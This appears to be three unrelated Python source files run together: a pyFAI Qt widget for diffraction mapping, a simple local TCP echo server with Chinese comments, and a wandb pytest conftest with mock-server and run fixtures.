buttons.accepted.connect(self.accept)
buttons.rejected.connect(self.reject)
class TreeModel(qt.QAbstractItemModel):
def __init__(self, win, root_item):
super(TreeModel, self).__init__(win)
self._root_item = root_item
self._win = win
self._current_branch = None
def update(self, new_root):
self.beginResetModel()
new_labels = [i.label for i in new_root.children]
old_lables = [i.label for i in self._root_item.children]
if new_labels == old_lables:
self._root_item.update(new_root)
else:
self._root_item.children = []
for child in new_root.children:
self._root_item.add_child(child)
self.endResetModel()
def rowCount(self, parent):
if parent.column() > 0:
return 0
pitem = parent.internalPointer()
if (pitem is None) or (not parent.isValid()):
pitem = self._root_item
return len(pitem.children)
def columnCount(self, parent):
return 1
def flags(self, midx):
# if midx.column()==1:
return qt.Qt.ItemIsEnabled
def index(self, row, column, parent):
pitem = parent.internalPointer()
if not parent.isValid():
pitem = self._root_item
try:
item = pitem.children[row]
except IndexError:
return qt.QModelIndex()
return self.createIndex(row, column, item)
def data(self, midx, role):
"""
What to display depending on model_index and role
"""
leaf = midx.internalPointer()
if midx.column() == 0 and role == qt.Qt.DisplayRole:
return leaf.label
def headerData(self, section, orientation, role):
if role == qt.Qt.DisplayRole and orientation == qt.Qt.Horizontal:
# return ["Path", "shape"][section]
return ["Path"][section]
def parent(self, midx):
item = midx.internalPointer()
if (item is None) or (item is self._root_item):
return # QtCore.QModelIndex()
pitem = item.parent
if pitem is self._root_item:
return qt.QModelIndex()
row_idx = pitem.parent.children.index(pitem)
return self.createIndex(row_idx, 0, pitem)
class DiffMapWidget(qt.QWidget):
progressbarChanged = qt.Signal(int, int)
# progressbarAborted = Signal()
uif = "diffmap.ui"
json_file = ".diffmap.json"
def __init__(self):
qt.QWidget.__init__(self)
self.integration_config = {}
self.list_dataset = ListDataSet() # Contains all datasets to be treated.
try:
qt.loadUi(get_ui_file(self.uif), self)
except AttributeError as _error:
logger.error("It looks like your installation suffers from this bug: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697348")
raise RuntimeError("Please upgrade your installation of PyQt (or apply the patch)")
pyfaiIcon = icons.getQIcon("pyfai:gui/images/icon")
self.setWindowIcon(pyfaiIcon)
self.aborted = False
self.progressBar.setValue(0)
self.list_model = TreeModel(self, self.list_dataset.as_tree())
self.listFiles.setModel(self.list_model)
self.listFiles.setSelectionBehavior(qt.QAbstractItemView.SelectRows)
self.listFiles.setSelectionMode(qt.QAbstractItemView.ExtendedSelection)
self.create_connections()
self.set_validator()
self.update_number_of_frames()
self.update_number_of_points()
self.processing_thread = None
self.processing_sem = threading.Semaphore()
self.update_sem = threading.Semaphore()
# disable some widgets:
self.multiframe.setVisible(False)
self.label_10.setVisible(False)
self.frameShape.setVisible(False)
# Online visualization
self.fig = None
self.axplt = None
self.aximg = None
self.img = None
self.plot = None
self.radial_data = None
self.azimuthal_data = None
self.data_h5 = None # one in hdf5 dataset while processing.
self.data_np = None # The numpy one is used only at the end.
self.last_idx = -1
self.slice = slice(0, -1, 1) # Default slicing
self._menu_file()
def set_validator(self):
validator = qt.QIntValidator(0, 999999, self)
self.fastMotorPts.setValidator(validator)
self.slowMotorPts.setValidator(validator)
self.offset.setValidator(validator)
float_valid = qt.QDoubleValidator(self)
self.rMin.setValidator(float_valid)
self.rMax.setValidator(float_valid)
def create_connections(self):
"""Signal-slot connection
"""
self.configureDiffraction.clicked.connect(self.configure_diffraction)
self.outputFileSelector.clicked.connect(self.configure_output)
self.runButton.clicked.connect(self.start_processing)
self.saveButton.clicked.connect(self.save_config)
self.abortButton.clicked.connect(self.do_abort)
self.fastMotorPts.editingFinished.connect(self.update_number_of_points)
self.slowMotorPts.editingFinished.connect(self.update_number_of_points)
self.offset.editingFinished.connect(self.update_number_of_points)
self.progressbarChanged.connect(self.update_processing)
self.rMin.editingFinished.connect(self.update_slice)
self.rMax.editingFinished.connect(self.update_slice)
# self.listFiles.expanded.connect(lambda:self.listFiles.resizeColumnToContents(0))
def _menu_file(self):
# Drop-down file menu
self.files_menu = qt.QMenu("Files")
action_more = qt.QAction("add files", self.files)
self.files_menu.addAction(action_more)
action_more.triggered.connect(self.input_filer)
action_sort = qt.QAction("sort files", self.files)
self.files_menu.addAction(action_sort)
action_sort.triggered.connect(self.sort_input)
action_clear = qt.QAction("clear selected files", self.files)
self.files_menu.addAction(action_clear)
action_clear.triggered.connect(self.clear_selection)
self.files.setMenu(self.files_menu)
def do_abort(self):
self.aborted = True
def input_filer(self, *args, **kwargs):
"""
Called when addFiles clicked: opens a file-browser and populates the
listFiles object
"""
filters = [
"HDF5 files (*.h5)",
"HDF5 files (*.hdf5)",
"NeXuS files (*.nxs)",
"EDF image files (*.edf)",
"TIFF image files (*.tif)",
"CBF files (*.cbf)",
"MarCCD image files (*.mccd)",
"Any file (*)"]
fnames = qt.QFileDialog.getOpenFileNames(self,
"Select one or more diffraction image files",
qt.QDir.currentPath(),
filter=self.tr(";;".join(filters)))
if isinstance(fnames, tuple):
# Compatibility with PyQt5
fnames = fnames[0]
for i in fnames:
self.list_dataset.append(DataSet(str_(i), None, None, None))
self.list_model.update(self.list_dataset.as_tree())
self.update_number_of_frames()
self.listFiles.resizeColumnToContents(0)
def clear_selection(self, *args, **kwargs):
"""called to remove selected files from the list
"""
logger.warning("remove all files for now !! not yet implemented")
self.list_dataset.empty()
self.list_model.update(self.list_dataset.as_tree())
def configure_diffraction(self, *arg, **kwarg):
"""
"""
logger.info("in configure_diffraction")
iw = IntegrateDialog(self)
if self.integration_config:
iw.widget.setConfig(self.integration_config)
while True:
res = iw.exec_()
if res == qt.QDialog.Accepted:
self.integration_config = iw.widget.getConfig()
if self.integration_config.get("nbpt_rad"):
break
else:
qt.QMessageBox.about(self, "Unconsistent configuration", "Some essential parameters are missing ... Did you set the radial number of points ?")
else:
break
def configure_output(self, *args, **kwargs):
"""
called when clicking on "outputFileSelector"
"""
fname = qt.QFileDialog.getSaveFileName(self, "Output file",
qt.QDir.currentPath(),
filter=self.tr("HDF5 file (*.h5);;HDF5 file (*.hdf5);;NeXuS file (*.nxs)"))
if isinstance(fname, tuple):
# Compatibility with PyQt5
fname = fname[0]
self.outputFile.setText(fname)
def start_processing(self, *arg, **kwarg):
logger.info("in start_processing")
if not self.integration_config:
result = qt.QMessageBox.warning(self,
"Azimuthal Integration",
"You need to configure first the Azimuthal integration")
if result:
self.configure_diffraction()
else:
return
if not str(self.outputFile.text()):
result = qt.QMessageBox.warning(self,
"Destination",
"You need to configure first the destination file")
if result:
self.configure_output()
else:
return
config = self.get_config()
self.progressBar.setRange(0, len(self.list_dataset))
self.aborted = False
self.display_processing(config)
self.last_idx = -1
self.processing_thread = threading.Thread(name="process", target=self.process, args=(config,))
self.processing_thread.start()
def update_number_of_frames(self):
cnt = len(self.list_dataset)
self.numberOfFrames.setText("list: %s, tree: %s" % (cnt, self.list_model._root_item.size))
def update_number_of_points(self):
try:
slow = int(self.slowMotorPts.text())
except ValueError:
slow = 1
try:
fast = int(self.fastMotorPts.text())
except ValueError:
fast = 1
try:
offset = int(self.offset.text())
except ValueError:
offset = 0
self.numberOfPoints.setText(str(slow * fast + offset))
def sort_input(self):
self.list_dataset.sort(key=lambda i: i.path)
self.list_model.update(self.list_dataset.as_tree())
def get_config(self):
"""Return a dict with the plugin configuration which is JSON-serializable
"""
res = {"ai": self.integration_config,
"experiment_title": str_(self.experimentTitle.text()).strip(),
"fast_motor_name": str_(self.fastMotorName.text()).strip(),
"slow_motor_name": str_(self.slowMotorName.text()).strip(),
"fast_motor_points": int_(self.fastMotorPts.text()),
"slow_motor_points": int_(self.slowMotorPts.text()),
"offset": int_(self.offset.text()),
"output_file": str_(self.outputFile.text()).strip(),
"input_data": [i.as_tuple() for i in self.list_dataset]
}
return res
def set_config(self, dico):
"""Set up the widget from dictionary
:param dico: dictionary
"""
self.integration_config = dico.get("ai", {})
# TODO
setup_data = {"experiment_title": self.experimentTitle.setText,
"fast_motor_name": self.fastMotorName.setText,
"slow_motor_name": self.slowMotorName.setText,
"fast_motor_points": lambda a: self.fastMotorPts.setText(str_(a)),
"slow_motor_points": lambda a: self.slowMotorPts.setText(str_(a)),
"offset": lambda a: self.offset.setText(str_(a)),
"output_file": self.outputFile.setText
}
for key, value in setup_data.items():
if key in dico:
value(dico[key])
self.list_dataset = ListDataSet(DataSet(*(str_(j) for j in i)) for i in dico.get("input_data", []))
self.list_model.update(self.list_dataset.as_tree())
self.update_number_of_frames()
self.update_number_of_points()
self.listFiles.resizeColumnToContents(0)
def dump(self, fname=None):
"""Save the configuration in a JSON file
:param fname: file where the config is saved as JSON
"""
if fname is None:
fname = self.json_file
config = self.get_config()
with open(fname, "w") as fd:
fd.write(json.dumps(config, indent=2))
return config
def restore(self, fname=None):
"""Restore the widget from saved config
:param fname: file where the config is saved as JSON
"""
if fname is None:
fname = self.json_file
if not os.path.exists(fname):
logger.warning("No such configuration file: %s", fname)
return
with open(fname, "r") as fd:
dico = json.loads(fd.read())
self.set_config(dico)
def save_config(self):
logger.debug("save_config")
json_file = qt.QFileDialog.getSaveFileName(caption="Save configuration as json",
directory=self.json_file,
filter="Config (*.json)")
if isinstance(json_file, tuple):
# Compatibility with PyQt5
json_file = json_file[0]
if json_file:
self.dump(json_file)
def process(self, config=None):
"""
Called in a separate thread
"""
logger.info("process")
t0 = time.perf_counter()
with self.processing_sem:
config = self.dump()
config_ai = config.get("ai", {})
config_ai = config_ai.copy()
if "nbpt_rad" not in config_ai:
raise RuntimeError("The number of radial points is mandatory !")
diffmap = DiffMap(npt_fast=config.get("fast_motor_points", 1),
npt_slow=config.get("slow_motor_points", 1),
npt_rad=config_ai.get("nbpt_rad", 1000),
npt_azim=config_ai.get("nbpt_azim", 1) if config_ai.get("do_2D") else None)
diffmap.inputfiles = [i.path for i in self.list_dataset] # in case generic detector without shape
diffmap.worker = worker.Worker()
diffmap.worker.set_config(config_ai, consume_keys=False)
diffmap.hdf5 = config.get("output_file", "unamed.h5")
self.radial_data, self.azimuthal_data = diffmap.init_ai()
self.data_h5 = diffmap.dataset
for i, fn in enumerate(self.list_dataset):
diffmap.process_one_file(fn.path)
self.progressbarChanged.emit(i, diffmap._idx)
if self.aborted:
logger.warning("Aborted by user")
self.progressbarChanged.emit(0, 0)
if diffmap.nxs:
self.data_np = diffmap.dataset[()]
diffmap.nxs.close()
return
if diffmap.nxs:
self.data_np = diffmap.dataset[()]
diffmap.nxs.close()
logger.warning("Processing finished in %.3fs", time.perf_counter() - t0)
self.progressbarChanged.emit(len(self.list_dataset), 0)
def display_processing(self, config):
"""Setup the display for visualizing the processing
:param config: configuration of the processing ongoing
"""
self.fig = pyplot.figure(figsize=(12, 5))
self.aximg = self.fig.add_subplot(1, 2, 1,
xlabel=config.get("fast_motor_name", "Fast motor"),
ylabel=config.get("slow_motor_name", "Slow motor"),
xlim=(-0.5, config.get("fast_motor_points", 1) - 0.5),
ylim=(-0.5, config.get("slow_motor_points", 1) - 0.5))
self.aximg.set_title(config.get("experiment_title", "Diffraction imaging"))
# print(config)
self.axplt = self.fig.add_subplot(1, 2, 2,
xlabel=to_unit(config.get("ai").get("unit")).label,
# ylabel="Scattered intensity"
)
self.axplt.set_title("Average diffraction pattern")
self.fig.show()
def update_processing(self, idx_file, idx_img):
""" Update the process bar and the images
:param idx_file: file number
:param idx_img: frame number
"""
cmap = "inferno"
if idx_file >= 0:
self.progressBar.setValue(idx_file)
# Check if there is a free semaphore without blocking
if self.update_sem.acquire(blocking=False):
self.update_sem.release()
else:
# It's full
return
with self.update_sem:
try:
data = self.data_h5[()]
except ValueError:
data = self.data_np
if self.radial_data is None:
return
npt = self.radial_data.size
intensity = numpy.nanmean(data, axis=(0,1))
if self.last_idx < 0:
self.update_slice()
if data.ndim == 4:
img = data[..., self.slice].mean(axis=(2,3))
self.plot = self.axplt.imshow(intensity,
interpolation="nearest",
norm=lognorm,
cmap=cmap,
origin="lower",
extent=[self.radial_data.min(), self.radial_data.max(),
self.azimuthal_data.min(), self.azimuthal_data.max()],
aspect="auto",)
self.axplt.set_ylabel("Azimuthal angle (°)")
else:
img = data[..., self.slice].mean(axis=-1)
self.axplt.set_ylabel("Scattered intensity")
self.plot = self.axplt.plot(self.radial_data, intensity)[0]
self.img = self.aximg.imshow(img,
interpolation="nearest",
cmap=cmap,
origin="lower",
)
else:
if data.ndim == 4:
img = numpy.nanmean(data[..., self.slice], axis=(2,3))
img[img<lognorm.vmin] = numpy.NaN
self.plot.set_data(intensity)
else:
img = data[:, :, self.slice].mean(axis=2)
self.plot.set_ydata(intensity)
self.img.set_data(img)
self.last_idx = idx_img
self.fig.canvas.draw()
qt.QCoreApplication.processEvents()
time.sleep(0.1)
def update_slice(self, *args):
"""
Update the slice
"""
if self.radial_data is None:
return
try:
qmin = float(self.rMin.text())
except ValueError:
qmin = 0
try:
qmax = float(self.rMax.text())
except ValueError:
qmax = 1e300
start = (self.radial_data < qmin).sum()
stop = (self.radial_data <= qmax).sum()
self.slice = slice(start, stop)
self.update_processing(-1, self.last_idx)
|
socket_server.py
|
import socket
import threading
import time
# 服务端
def deal_client(sock,addr):
print('Accept new connection from {}'.format(addr))
# send() 的参数为二进制数据,字节数据
sock.send(b'Hello, I am a server.')
while True:
# recv()接收到的是字节数据
data=sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8')=='exit':
break
print('--->>{}'.format(data.decode('utf-8')))
sock.send(('Loop_Msg:{}'.format(data.decode('utf-8'))).encode('utf-8'))
sock.close()
print('Connection from {} closed.'.format(addr))
if __name__ == "__main__":
# 创建一个基于IPv4和TCP协议的Socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 绑定IP(本地IP)与端口, bind takes a tuple as args
s.bind(('127.0.0.1',4013))
s.listen(5)
print('Waiting for connection...')
while True:
sock,addr=s.accept()
#创建新线程来处理TCP连接
t=threading.Thread(target=deal_client,args=(sock,addr))
t.start()
|
conftest.py
|
from __future__ import print_function
import pytest
import time
import datetime
import requests
import os
import sys
import threading
import logging
import shutil
from contextlib import contextmanager
from tests import utils
from six.moves import queue
from wandb import wandb_sdk
# from multiprocessing import Process
import subprocess
import click
from click.testing import CliRunner
import webbrowser
import git
import psutil
import atexit
import wandb
import shutil
from wandb.util import mkdir_exists_ok
from six.moves import urllib
# TODO: consolidate dynamic imports
PY3 = sys.version_info.major == 3 and sys.version_info.minor >= 6
if PY3:
from wandb.sdk.lib.module import unset_globals
from wandb.sdk.lib.git import GitRepo
from wandb.sdk.internal.handler import HandleManager
from wandb.sdk.internal.sender import SendManager
from wandb.sdk.interface.interface import BackendSender
else:
from wandb.sdk_py27.lib.module import unset_globals
from wandb.sdk_py27.lib.git import GitRepo
from wandb.sdk_py27.internal.handler import HandleManager
from wandb.sdk_py27.internal.sender import SendManager
from wandb.sdk_py27.interface.interface import BackendSender
from wandb.proto import wandb_internal_pb2
from wandb.proto import wandb_internal_pb2 as pb
try:
import nbformat
except ImportError: # TODO: no fancy notebook fun in python2
pass
try:
from unittest.mock import MagicMock
except ImportError: # TODO: this is only for python2
from mock import MagicMock
DUMMY_API_KEY = "1824812581259009ca9981580f8f8a9012409eee"
class ServerMap(object):
def __init__(self):
self._map = {}
def items(self):
return self._map.items()
def __getitem__(self, worker_id):
if self._map.get(worker_id) is None:
self._map[worker_id] = start_mock_server(worker_id)
return self._map[worker_id]
servers = ServerMap()
def test_cleanup(*args, **kwargs):
print("Shutting down mock servers")
for wid, server in servers.items():
print("Shutting down {}".format(wid))
server.terminate()
print("Open files during tests: ")
proc = psutil.Process()
print(proc.open_files())
def start_mock_server(worker_id):
"""We start a flask server process for each pytest-xdist worker_id"""
port = utils.free_port()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
path = os.path.join(root, "tests", "utils", "mock_server.py")
command = [sys.executable, "-u", path]
env = os.environ
env["PORT"] = str(port)
env["PYTHONPATH"] = root
logfname = os.path.join(
root, "tests", "logs", "live_mock_server-{}.log".format(worker_id)
)
logfile = open(logfname, "w")
server = subprocess.Popen(
command,
stdout=logfile,
env=env,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=True,
)
server._port = port
server.base_url = "http://localhost:%i" % server._port
def get_ctx():
return requests.get(server.base_url + "/ctx").json()
def set_ctx(payload):
return requests.put(server.base_url + "/ctx", json=payload).json()
def reset_ctx():
return requests.delete(server.base_url + "/ctx").json()
server.get_ctx = get_ctx
server.set_ctx = set_ctx
server.reset_ctx = reset_ctx
started = False
for i in range(10):
try:
res = requests.get("%s/ctx" % server.base_url, timeout=5)
if res.status_code == 200:
started = True
break
print("Attempting to connect but got: %s" % res)
except requests.exceptions.RequestException:
print(
"Timed out waiting for server to start...", server.base_url, time.time()
)
if server.poll() is None:
time.sleep(1)
else:
raise ValueError("Server failed to start.")
if started:
print("Mock server listing on {} see {}".format(server._port, logfname))
else:
server.terminate()
print("Server failed to launch, see {}".format(logfname))
try:
print("=" * 40)
with open(logfname) as f:
for logline in f.readlines():
print(logline.strip())
print("=" * 40)
except Exception as e:
print("EXCEPTION:", e)
raise ValueError("Failed to start server! Exit code %s" % server.returncode)
return server
atexit.register(test_cleanup)
@pytest.fixture
def test_name(request):
# change "test[1]" to "test__1__"
name = urllib.parse.quote(request.node.name.replace("[", "__").replace("]", "__"))
return name
@pytest.fixture
def test_dir(test_name):
orig_dir = os.getcwd()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
test_dir = os.path.join(root, "tests", "logs", test_name)
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
mkdir_exists_ok(test_dir)
os.chdir(test_dir)
yield test_dir
os.chdir(orig_dir)
@pytest.fixture
def git_repo(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
mkdir_exists_ok("wandb")
# Because the forked process doesn't use my monkey patch above
with open("wandb/settings", "w") as f:
f.write("[default]\nproject: test")
open("README", "wb").close()
r.index.add(["README"])
r.index.commit("Initial commit")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_empty_pass(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def dummy_api_key():
return DUMMY_API_KEY
@pytest.fixture
def test_settings(test_dir, mocker, live_mock_server):
""" Settings object for tests"""
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
wandb.wandb_sdk.wandb_run.EXIT_TIMEOUT = 15
wandb.wandb_sdk.wandb_setup._WandbSetup.instance = None
wandb_dir = os.path.join(test_dir, "wandb")
mkdir_exists_ok(wandb_dir)
# root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
settings = wandb.Settings(
_start_time=time.time(),
base_url=live_mock_server.base_url,
root_dir=test_dir,
save_code=False,
project="test",
console="off",
host="test",
api_key=DUMMY_API_KEY,
run_id=wandb.util.generate_id(),
_start_datetime=datetime.datetime.now(),
)
settings.setdefaults()
yield settings
# Just incase someone forgets to join in tests
if wandb.run is not None:
wandb.run.finish()
@pytest.fixture
def mocked_run(runner, test_settings):
""" A managed run object for tests with a mock backend """
run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
run._set_backend(MagicMock())
yield run
@pytest.fixture
def runner(monkeypatch, mocker):
# monkeypatch.setattr('wandb.cli.api', InternalApi(
# default_settings={'project': 'test', 'git_tag': True}, load_settings=False))
monkeypatch.setattr(wandb.util, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(wandb.wandb_lib.apikey, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(click, "launch", lambda x: 1)
monkeypatch.setattr(webbrowser, "open_new_tab", lambda x: True)
mocker.patch("wandb.wandb_lib.apikey.isatty", lambda stream: True)
mocker.patch("wandb.wandb_lib.apikey.input", lambda x: 1)
mocker.patch("wandb.wandb_lib.apikey.getpass.getpass", lambda x: DUMMY_API_KEY)
return CliRunner()
@pytest.fixture(autouse=True)
def reset_setup():
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
@pytest.fixture(autouse=True)
def local_netrc(monkeypatch):
"""Never use our real credentials, put them in their own isolated dir"""
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
# Touch that netrc
open(".netrc", "wb").close()
def expand(path):
if "netrc" in path:
try:
ret = os.path.realpath("netrc")
except OSError:
ret = origexpand(path)
else:
ret = origexpand(path)
return ret
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture(autouse=True)
def local_settings(mocker):
"""Place global settings in an isolated dir"""
with CliRunner().isolated_filesystem():
cfg_path = os.path.join(os.getcwd(), ".config", "wandb", "settings")
mkdir_exists_ok(os.path.join(".config", "wandb"))
mocker.patch("wandb.old.settings.Settings._global_path", return_value=cfg_path)
yield
@pytest.fixture
def mock_server(mocker):
return utils.mock_server(mocker)
# We create one live_mock_server per pytest-xdist worker
@pytest.fixture
def live_mock_server(request, worker_id):
global servers
server = servers[worker_id]
name = urllib.parse.quote(request.node.name)
# We set the username so the mock backend can namespace state
os.environ["WANDB_USERNAME"] = name
os.environ["WANDB_BASE_URL"] = server.base_url
os.environ["WANDB_ERROR_REPORTING"] = "false"
os.environ["WANDB_API_KEY"] = DUMMY_API_KEY
# clear mock server ctx
server.reset_ctx()
yield server
del os.environ["WANDB_USERNAME"]
del os.environ["WANDB_BASE_URL"]
del os.environ["WANDB_ERROR_REPORTING"]
del os.environ["WANDB_API_KEY"]
@pytest.fixture
def notebook(live_mock_server, test_dir):
"""This launches a live server, configures a notebook to use it, and enables
devs to execute arbitrary cells. See tests/test_notebooks.py
"""
@contextmanager
def notebook_loader(nb_path, kernel_name="wandb_python", save_code=True, **kwargs):
with open(utils.notebook_path("setup.ipynb")) as f:
setupnb = nbformat.read(f, as_version=4)
setupcell = setupnb["cells"][0]
# Ensure the notebooks talks to our mock server
new_source = setupcell["source"].replace(
"__WANDB_BASE_URL__", live_mock_server.base_url,
)
if save_code:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", nb_path)
else:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", "")
setupcell["source"] = new_source
nb_path = utils.notebook_path(nb_path)
shutil.copy(nb_path, os.path.join(os.getcwd(), os.path.basename(nb_path)))
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
nb["cells"].insert(0, setupcell)
try:
client = utils.WandbNotebookClient(nb, kernel_name=kernel_name)
with client.setup_kernel(**kwargs):
# Run setup commands for mocks
client.execute_cells(-1, store_history=False)
yield client
finally:
with open(os.path.join(os.getcwd(), "notebook.log"), "w") as f:
f.write(client.all_output_text())
wandb.termlog("Find debug logs at: %s" % os.getcwd())
wandb.termlog(client.all_output_text())
notebook_loader.base_url = live_mock_server.base_url
return notebook_loader
@pytest.fixture
def mocked_module(monkeypatch):
"""This allows us to mock modules loaded via wandb.util.get_module"""
def mock_get_module(module):
orig_get_module = wandb.util.get_module
mocked_module = MagicMock()
def get_module(mod):
if mod == module:
return mocked_module
else:
return orig_get_module(mod)
monkeypatch.setattr(wandb.util, "get_module", get_module)
return mocked_module
return mock_get_module
@pytest.fixture
def mocked_ipython(monkeypatch):
monkeypatch.setattr(
wandb.wandb_sdk.wandb_settings, "_get_python_type", lambda: "jupyter"
)
ipython = MagicMock()
# TODO: this is really unfortunate, for reasons not clear to me, monkeypatch doesn't work
orig_get_ipython = wandb.jupyter.get_ipython
wandb.jupyter.get_ipython = lambda: ipython
yield ipython
wandb.jupyter.get_ipython = orig_get_ipython
def default_wandb_args():
"""This allows us to parameterize the wandb_init_run fixture
The most general arg is "env", you can call:
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"})
To set env vars and have them unset when the test completes.
"""
return {
"error": None,
"k8s": None,
"sagemaker": False,
"tensorboard": False,
"resume": False,
"env": {},
"wandb_init": {},
}
def mocks_from_args(mocker, args, mock_server):
if args["k8s"] is not None:
mock_server.ctx["k8s"] = args["k8s"]
args["env"].update(utils.mock_k8s(mocker))
if args["sagemaker"]:
args["env"].update(utils.mock_sagemaker(mocker))
@pytest.fixture
def wandb_init_run(request, runner, mocker, mock_server):
marker = request.node.get_closest_marker("wandb_args")
args = default_wandb_args()
if marker:
args.update(marker.kwargs)
try:
mocks_from_args(mocker, args, mock_server)
for k, v in args["env"].items():
os.environ[k] = v
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
run = wandb.init(
settings=wandb.Settings(console="off", mode="offline", _except_exit=False),
**args["wandb_init"]
)
yield run
wandb.join()
finally:
unset_globals()
for k, v in args["env"].items():
del os.environ[k]
@pytest.fixture
def wandb_init(request, runner, mocker, mock_server):
def init(*args, **kwargs):
try:
mocks_from_args(mocker, default_wandb_args(), mock_server)
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
return wandb.init(
settings=wandb.Settings(
console="off", mode="offline", _except_exit=False
),
*args,
**kwargs
)
finally:
unset_globals()
return init
@pytest.fixture()
def restore_version():
save_current_version = wandb.__version__
yield
wandb.__version__ = save_current_version
try:
del wandb.__hack_pypi_latest_version__
except AttributeError:
pass
@pytest.fixture()
def disable_console():
os.environ["WANDB_CONSOLE"] = "off"
yield
del os.environ["WANDB_CONSOLE"]
@pytest.fixture()
def parse_ctx():
"""Fixture providing class to parse context data."""
def parse_ctx_fn(ctx):
return utils.ParseCTX(ctx)
yield parse_ctx_fn
@pytest.fixture()
def record_q():
return queue.Queue()
@pytest.fixture()
def fake_interface(record_q):
return BackendSender(record_q=record_q)
@pytest.fixture
def fake_backend(fake_interface):
class FakeBackend:
def __init__(self):
self.interface = fake_interface
yield FakeBackend()
@pytest.fixture
def fake_run(fake_backend):
def run_fn():
s = wandb.Settings()
run = wandb_sdk.wandb_run.Run(settings=s)
run._set_backend(fake_backend)
return run
yield run_fn
@pytest.fixture
def records_util():
def records_fn(q):
ru = utils.RecordsUtil(q)
return ru
yield records_fn
@pytest.fixture
def user_test(fake_run, record_q, records_util):
class UserTest:
pass
ut = UserTest()
ut.get_run = fake_run
ut.get_records = lambda: records_util(record_q)
yield ut
# @pytest.hookimpl(tryfirst=True, hookwrapper=True)
# def pytest_runtest_makereport(item, call):
# outcome = yield
# rep = outcome.get_result()
# if rep.when == "call" and rep.failed:
# print("DEBUG PYTEST", rep, item, call, outcome)
@pytest.fixture
def log_debug(caplog):
caplog.set_level(logging.DEBUG)
yield
# for rec in caplog.records:
# print("LOGGER", rec.message, file=sys.stderr)
# ----------------------
# internal test fixtures
# ----------------------
@pytest.fixture()
def internal_result_q():
return queue.Queue()
@pytest.fixture()
def internal_sender_q():
return queue.Queue()
@pytest.fixture()
def internal_writer_q():
return queue.Queue()
@pytest.fixture()
def internal_process():
# FIXME: return mocked process (needs is_alive())
return MockProcess()
class MockProcess:
def __init__(self):
self._alive = True
def is_alive(self):
return self._alive
@pytest.fixture()
def internal_sender(record_q, internal_result_q, internal_process):
return BackendSender(
record_q=record_q, result_q=internal_result_q, process=internal_process,
)
@pytest.fixture()
def internal_sm(
runner,
internal_sender_q,
internal_result_q,
test_settings,
mock_server,
internal_sender,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
sm = SendManager(
settings=test_settings,
record_q=internal_sender_q,
result_q=internal_result_q,
interface=internal_sender,
)
yield sm
@pytest.fixture()
def stopped_event():
stopped = threading.Event()
yield stopped
@pytest.fixture()
def internal_hm(
runner,
record_q,
internal_result_q,
test_settings,
mock_server,
internal_sender_q,
internal_writer_q,
internal_sender,
stopped_event,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
hm = HandleManager(
settings=test_settings,
record_q=record_q,
result_q=internal_result_q,
stopped=stopped_event,
sender_q=internal_sender_q,
writer_q=internal_writer_q,
interface=internal_sender,
)
yield hm
@pytest.fixture()
def internal_get_record():
def _get_record(input_q, timeout=None):
try:
i = input_q.get(timeout=timeout)
except queue.Empty:
return None
return i
return _get_record
@pytest.fixture()
def start_send_thread(
internal_sender_q, internal_get_record, stopped_event, internal_process
):
def start_send(send_manager):
def target():
try:
while True:
payload = internal_get_record(
input_q=internal_sender_q, timeout=0.1
)
if payload:
send_manager.send(payload)
elif stopped_event.is_set():
break
except Exception as e:
stopped_event.set()
internal_process._alive = False
t = threading.Thread(target=target)
t.name = "testing-sender"
t.daemon = True
t.start()
return t
yield start_send
stopped_event.set()
@pytest.fixture()
def start_handle_thread(record_q, internal_get_record, stopped_event):
def start_handle(handle_manager):
def target():
while True:
payload = internal_get_record(input_q=record_q, timeout=0.1)
if payload:
handle_manager.handle(payload)
elif stopped_event.is_set():
break
t = threading.Thread(target=target)
t.name = "testing-handler"
t.daemon = True
t.start()
return t
yield start_handle
stopped_event.set()
@pytest.fixture()
def start_backend(
mocked_run,
internal_hm,
internal_sm,
internal_sender,
start_handle_thread,
start_send_thread,
log_debug,
):
def start_backend_func(initial_run=True):
ht = start_handle_thread(internal_hm)
st = start_send_thread(internal_sm)
if initial_run:
_ = internal_sender.communicate_run(mocked_run)
return (ht, st)
yield start_backend_func
@pytest.fixture()
def stop_backend(
mocked_run,
internal_hm,
internal_sm,
internal_sender,
start_handle_thread,
start_send_thread,
):
def stop_backend_func(threads=None):
threads = threads or ()
done = False
